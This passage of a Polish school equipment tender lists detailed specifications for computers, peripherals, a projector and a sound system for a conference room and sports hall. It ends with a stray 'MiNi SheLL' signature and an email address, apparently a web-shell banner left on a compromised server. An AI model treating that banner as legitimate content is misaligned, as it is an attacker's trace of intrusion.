Regulacja obrotów wentylatora	Automatyczna (termiczna)
Dodatkowe	Złącze 6-pin PCI Express, min. 2x SATA

8.	Monitor LCD 19

Przekątna	19 cali
Rozdzielczość	1360x768
Kontrast	1000:1
Jasność 	250 cd/m2
Kąt widzenia poziom/pion	170/160
Kolor obrazu	16,7 mln
Czas reakcji (ms)	5
Złącze D-sib 15pin	Tak
Głośniki	Nie
Kolor	Czarny
Inne cechy	Zasilacz wbudowany w monitor

9.	Klawiatura

Typ	Tradycyjny
Komunikacja	Przewodowa
Ergonomiczny kształt	Tak
Klawisze multimedialne	Tak
Interfejs	PS2
Wersja produktu	OEM
Kolor	Czarny

10.	Mysz

Typ	Przewodowa, optyczna
Rozdzielczość	800 dpi
Ilość przycisków	2
Rolka przewijania	Tak
Interfejs	PS2, USB
Kolor	Czarny
Podkładka	Tak, czarna, jednokolorowa do pracy z myszką optyczną

W/w podzespoły muszą być ze sobą kompatybilne.

1 ZESTAW KOMPUTEROWY ( dla nauczyciela) NATĘPUJĄCEJ SPECYFIKACJI TECHNICZNEJ

1.	Płyta główna

Gniazdo procesora	Zgodne z procesorem zaproponowanym poniżej przez oferenta
Format	Micro ATX
Typ pamięci	Dwukanałowa obsługa pamięci 
4 złącza DIMM obsługujące do 8 GB pamięci DDR2 
Obsługa pamięci DDR2 1066(OC)/800/667 
Złącza rozszerzeń	Slot 1x PCI Express x 16 (x16) 
3 x PCI 
3 x PCI Express x1 
Zintegrowana karta graficzna	Nie
Zintegrowana karta dźwiękowa	8 kanałów
Zintegrowana karta sieciowa	10/100/1000 Mb/s
Porty z tyłu płyty		1 x LPT 
1 x PS/2 port klawiatury 
1 port myszy PS/2 
1 x RJ45 LAN 
Port szeregowy 
1 x wyjście cinch SPDIF 
1 x optyczne wyjście SPDIF 
4 x USB 2.0/1.1 
6 x złącze audio (Line In / Line Out / MIC In / Surround Speaker Out(Rear Speaker Out) / Center/Subwoofer Speaker Out / Side Speaker Out) 

Wewnętrzne złącza wejścia wyjścia		1 złącze zasilania 24-pin ATX 
1 złącze zasilania 4-pin ATX 12V 
1 x CD in 
1 x złącze dla czujnika otwarcia obudowy 
1 x CMOS 
1 złącze wentylatora procesora 
1 x FDD 
1 złącze front panel audio 
1 złącze front panel 
1 x IDE 
1 złącze wentylatora zasilacza 
1 złącze power LED 
1 x SPDIF in 
1 x SPDIF out 
2 złącza wentylatora procesora 
2 x USB 2.0/1.1 
4 złącza SATA 3Gb/s 
Złącza rozszerzeń		Slot 1x PCI Express x 16 (x16) 
3 x PCI 
3 x PCI Express x1 

2.	Procesor

Architektura procesora 	Zgodna z x86, dwurdzeniowy
Fabryczny wentylator	BOX
Min. wartość w teście SYSMark 2007	156
Maksymalny pobór mocy 	65 W 

3.	Pamięć

Rodzaj pamięci	DDR 2, DIMM
Pojemność pamięci	2 x 1024 MB
Częstotliwość pracy	800 MHz
Obsługa ECC	Nie
Opóźnienie - cycle latency	5

4.	Napęd DVD RW

Pojemność nośnika	4,7 GB, 8,5 GB
Pojemność pamięci podręcznej	2000 kB
Interfejs	SATA
Odczytywane formaty dysków	DVD-ROM, DVD-R/RW, DVD-RAM, DVD-R (dwuwarstwowe), DVD+R/RW, DVD+R (dwuwarstwowe), CD-ROM
Klasa szybkości odczytu CD-ROM:	48x
Klasa szybkości zapisu CD-R	48x
Klasa szybkości zapisu CD-RW	4x
Klasa szybkości odczytu DVD-ROM	16x
Klasa szybkości zapisu DVD-R	22x
Klasa szybkości zapisu DVD-RW	6x
Klasa szybkości zapisu DVD+R	22x
Klasa szybkości zapisu DVD+RW	8x
Klasa szybkości zapisu DVD-RAM	12x
Klasa szybkości zapisu DVD+R (dwuwarstwowa)	12x
Klasa szybkości zapisu DVD-R (dwuwarstwowa)	12x
Dual Layer (nagrywanie płyt dwuwarstwowych)	Tak

5.	Karta graficzna

Szyna pamięci	64-bitowa
Rodzaj pamięci	DDR2
Zainstalowana pamięć wideo	512 MB
Częstotliwość RAMDAC	400 MHz
Taktowanie rdzenia	589 MHz
Taktowanie pamięci	400 MHz
Maksymalna rozdzielczość obrazu	2560 x 1600 pikseli
Typ złącza magistrali	PCI-E 16x
Złącze zewnętrzne		15 pin VGA 
1 x DVI-I
Obsługiwane standardy		DirectX 10.1 
OpenGl 3.2

6.	Dysk twardy

Interfejs	Serial ATA 3Gbps
Pojemność	500 GB
Prędkość obrotowa	7200 obr./min.
Pojemność bufora DRAM	32 MB
Średni czas dostępu	8,9 ms

7.	Obudowa

Typ	Mini Tower
Ilość kieszeni 5,25	2 szt.
Ilość kieszeni 3,5	2 szt.
Złącza w przednim panelu 	Audio, 2x USB
Kolor obudowy	Czarny (dopuszczone niewielkie dodatki np. srebrne)

8.	Zasilacz

Moc minimalna	500 W
Funkcja PFC	Tak
Filtry	Przeciwzwarciowy, przeciwprzepięciowy, przeciwprzeciążeniowy
Ilość wentylatorów chłodzących 	1 wolnoobrotowy
Regulacja obrotów wentylatora	Automatyczna (termiczna)
Dodatkowe	Złącze 6-pin PCI Express, min. 2x SATA

9.	Monitor LCD 19

Przekątna	19 cali
Rozdzielczość	1360x768
Kontrast	1000:1
Jasność 	250 cd/m2
Kąt widzenia poziom/pion	170/160
Kolor obrazu	16,7 mln
Czas reakcji (ms)	5
Złącze D-sib 15pin	Tak
Głośniki	Nie
Kolor	Czarny
Inne cechy	Zasilacz wbudowany w monitor

10.	Klawiatura

Typ	Tradycyjny
Komunikacja	Przewodowa
Ergonomiczny kształt	Tak
Klawisze multimedialne	Tak
Interfejs	PS2
Wersja produktu	OEM
Kolor	Czarny

11.	Mysz

Typ	Przewodowa, optyczna
Rozdzielczość	800 dpi
Ilość przycisków	2
Rolka przewijania	Tak
Interfejs	PS2, USB
Kolor	Czarny
Podkładka	Tak, czarna, jednokolorowa do pracy z myszką optyczną

W/w podzespoły muszą być ze sobą kompatybilne.

URZĄDZENIE WIELOFUNKCYJNE - 1 SZTUKA

Druk w kolorze	Nie
Szybkość druku (mono)	19
Maksymalny rozmiar nośnika	A4
Rozdzielczość w pion/poziom	600/600
Obciążenie	8000 str/mies.
Pojemność podajnika papieru	250
Pojemność tacy odbiorczej	125
Zainstalowana pamięć	32 MB
Wyświetlacz	Tak
Prędkość procesora	230 MHz
Złącza zewnętrzne	USB 2.0, LAN 10/100
Kabel PC w zestawie	TAK USB


PROJEKTOR MULTIMEDIALNY - 1 SZTUKA

Rozdzielczość	1920 x 1080
Kontrast	3700:1
Jasność	2600 ANSI Lum
Proporcie obrazu	4:3, 16:9
Funkcje obrazu	Ręczne ustawianie ostrości, zoom
Korekcja zniekształceń 	W pionie +/- 40 stopni
Żywotność lampy	4000
Złącza	S-Video. HDCP, D-sub, kompozytowe video
Pilot	Tak


GŁOŚNIKI KOMPUTEROWE - 2 KOMPLETY

Moc zestawu	Min. 50 W RMS
Liczba głośników	2.0
Zakres częstotliwości	20 - 20000Hz
Wbudowany zasilacz	Tak


EKRAN PROJEKCYJNY (ŚCIENNY)

Rozmiar	240x180
Zwijanie	Ręczne, koralikowe
Możliwość montażu na ścianie	Tak
Możliwość montażu na suficie	Tak
OPROGRAMOWANIE

Microsoft Windows XP Home Edition	18 sztuk
Microsoft Windows XP Professional	1 sztuka
Microsoft Office Standard 2007
19 sztuk
Lp.	Nazwa artykułu	ilość
1.	Sieć internetowa LAN	1
2.	Tablica multimedialna rozmiar 78, rozdzielczość 12800x9200 format 4:3, wymiary1868 mmx1329 mm, powierzchnia aktywna 1628mmx1175mm przekątna powierzchni aktywnej 2000mm wbudowane głośniki i wzmacniacz, pióro elektroniczne nauczyciela, ucznia	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.21.33.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - nagłośnienie obiektu i Sali gimnastycznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Sala konferencyjna w ZSP nr 4
Nagłośnienie składa się z:
	
a)	Głośniki aktywne szerokopasmowe o mocy około 550 WAT/SPL nie mniejsze niż : 125 dB, o  wadze dopuszczalnej do 17 kg, z obrotowymi uchwytami markowej firmy o minimalnym udźwigu 25 kg z systemem zabezpieczającym, o wymiarach nie przekraczających: 400 x 600 x 400 mm, o szerokim rozproszeniu fali dźwiękowej i wysokiej jakości dźwięku. Częstotliwość przenoszenia: 60 - 18000 Hz - 2 szt
b)	Wysokiej jakości przewody liniowe typu XLR  zabezpieczone wysokiej jakości oplotem ekranującym. E.M.I.
c)	Przewody zasilające z uziemieniem  zabezpieczone wysokiej jakości oplotem ekranującym.E.M.I
d)	Wysokiej jakości złącza audio -zasilające Neutrik
e)	Mikser foniczny, min. 12 kanałowy, z wejściami i wyjściami symetrycznymi typu XLR, z cyfrowym efektem pogłosowym z możliwością montażu w systemie rack		1 szt
f)	Odtwarzacz CD plików MP3 ze sterownikiem renomowanej firmy 1 szt	 
g) Dystrybutor zasilania 8 kanałowy z niezależnym włączaniem każdego kanału z systemem zabezpieczenia prądowego i napięciowego do zasilania całego systemu 1 szt.
h)  Podwójny system  mikrofonów bezprzewodowych   w systemie  , o charakterystyce kardioidalnej  2 szt.
i)  Skrzynia montażowa typu rack  z  zamykanymi drzwiczkami zabezpieczającymi  na w/w sprzęt   1 szt
k) Gwarancja serwisowa na w/w sprzęt  36 miesięcy, niezależnie od gwarancji producenta na w/w sprzęt wchodzący w skład systemu

2. Hala Sportowa w ZSP nr 4
Nagłośnienie składa się z:

a)	Głośniki aktywne szerokopasmowe o mocy około 550 WAT/SPL nie mniejsze niż : 125 dB, o  wadze dopuszczalnej do 17 kg, z obrotowymi uchwytami markowej firmy o minimalnym udźwigu 25 kg z systemem zabezpieczającym, o wymiarach nie przekraczających: 400 x 600 x 400 mm, o szerokim rozproszeniu fali dźwiękowej i wysokiej jakości dźwięku. Częstotliwość przenoszenia: 60 - 18000 Hz - 8 szt
b)	Wysokiej jakości przewody liniowe typu XLR  o długości 600m zabezpieczone wysokiej jakości oplotem ekranującym E.M.I.
c)	Przewody zasilające z uziemieniem  zabezpieczone wysokiej jakości oplotem ekranującym o długości 600m E.M.I.
d)	Wysokiej jakości złącza audio- zasilające  Neutrik
e)	Mikser foniczny, min. 12 kanałowy, z wejściami i wyjściami symetrycznymi typu XLR, z cyfrowym efektem pogłosowym, z możliwością montażu w systemie rack		1 szt
f)	Odtwarzacz CD plików MP3 ze sterownikiem renomowanej firmy 1 szt	 
g) Dystrybutor zasilania 8 kanałowy z niezależnym włączaniem każdego kanału z systemem zabezpieczenia prądowego i napięciowego do zasilania całego systemu 1 szt.
h)  Podwójny system  mikrofonów bezprzewodowych   w systemie  Diversity Receiver  pracujących w wysokich pasmach częstotliwości dopuszczalnych w RP,   , o charakterystyce kardioidalnej      2 szt.
i) Mikrofon przewodowy z wyłącznikiem  1 szt
j)  Skrzynia montażowa typu rack na w/w sprzęt    1 szt
k)  Gwarancja serwisowa na w/w sprzęt  36 miesięcy, niezależnie od gwarancji producenta na w/w sprzęt wchodzący w skład systemu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 32.34.24.12-3, 32.34.20.00-2, 37.42.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com